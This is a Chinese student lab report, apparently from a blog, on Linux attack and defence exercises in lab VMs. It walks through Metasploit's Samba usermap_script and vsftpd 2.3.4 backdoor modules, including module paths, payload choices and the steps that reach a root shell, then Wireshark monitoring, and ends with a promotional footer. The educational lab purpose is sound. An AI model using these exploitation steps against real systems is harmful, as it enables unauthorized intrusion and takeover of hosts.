(1)使用Metasploit进行Linux远程渗透攻击
| 虚拟机 | IP |
|---|---|
| kali | 192.168.200.7 |
| Metasploitable | 192.168.200.123 |
首先进行连通性测试,两台主机之间能够ping通
在kali攻击机中,使用msfconsole启动Metasploit渗透软件
输入search samba ,找到针对usermap_script安全漏洞的渗透攻击模块名称为exploirt/multi/usermap_script
通过命令use exploit/multi/samba/usermap_script使用渗透攻击模块。
输入show payloads,查看payload类型。
set payload cmd/unix/bind_netcat设置攻击的PAYLOAD为cmd/unix/bind_netcat
使用show options,会列出模块所需要的各种参数
设置靶机地址和攻击机地址
输入run进行攻击
输入ifconfig检查,显示了靶机的ip地址,攻击成功
输入whoami查询权限,发现已经获得了root权限
(2)实践作业:攻防对抗实践
| 虚拟机 | IP |
|---|---|
| kali(陈彦霖) | 192.168.239.234 |
| Metasploitable(吴煦雯) | 192.168.239.204 |
首先进行连通性测试,两台主机之间能够ping通
攻击实验
在kali攻击机中,使用msfconsole启动Metasploit渗透软件
使用 vsftp漏洞,查看可用负载
通过命令use exploit/unix/ftp/vsftpd_234_backdoor使用渗透攻击模块。
输入show payloads,查看payload类型。
set payloads payload/cmd/unix/interact设置攻击的PAYLOAD为 payload/cmd/unix/interact
设置靶机地址和攻击机地址
输入run进行攻击,输入ifconfig检查,显示了靶机的ip地址,攻击成功
输入whoami查询权限,发现已经获得了root权限
防守实验
| 虚拟机 | IP |
|---|---|
| kali(吴煦雯) | 192.168.239.236 |
| Metasploitable(陈彦霖) | 192.168.239.147 |
防御实验只需要在wireshark中进行监听即可。
输入ip.addr==192.168.239.147
结果如下
通过tcp数据流跟踪,可查询攻击指令过程
3.学习中遇到的问题及解决
- 问题1:Metasploitable 虚拟机修改桥接模式之后无法改变IP地址
- 问题1解决方案:更换网络之后重启虚拟机,ip地址已更改
- 问题2:视频中提供的漏洞 no session
- 问题2解决方案:更新新版Metasploitable
4.实践总结
经由本次实验,知晓了一些有关linux安全攻防及部分漏洞的知识。借由对其他主机展开攻击,并夺取控制权的过程,深化了对所学知识的领会,且通过实践操作和查阅资料,提升了动手与实践的能力。然而,同时也存在诸多不足之处,仍需继续学习。
参考资料
最后
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
如果你觉得这些内容对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
对你有帮助,需要这份全套学习资料的朋友可以戳我获取!!**](https://bbs.csdn.net/topics/618653875)
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且会持续更新!
482
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
